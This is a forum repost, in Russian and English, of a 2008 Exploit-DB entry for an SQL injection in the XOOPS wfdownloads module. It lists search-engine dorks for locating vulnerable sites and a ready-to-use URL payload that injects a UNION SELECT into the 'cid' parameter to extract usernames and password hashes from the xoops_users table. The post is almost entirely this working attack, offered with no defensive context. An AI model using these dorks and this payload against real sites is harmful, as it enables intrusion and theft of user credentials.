Exploit XOOPS Module wfdownloads - 'cid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5218
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-03-06
Код:
###############################################################
#
###########XOOPS module wfdownloads SQL Injection
#
###############################################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAiL : [email protected]
#
################################################################
#
##DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"
#
##DORK 2 : allinurl: "modules/wfdownloads"
#
################################################################
EXPLOIT :

modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

################################################################
##S@BUN#############i AM NOT HACKER##########S@BUN#########
################################################################
##S@BUN######[email protected]####S@BUN#########
################################################################

# milw0rm.com [2008-03-06]
 
Источник
www.exploit-db.com

Похожие темы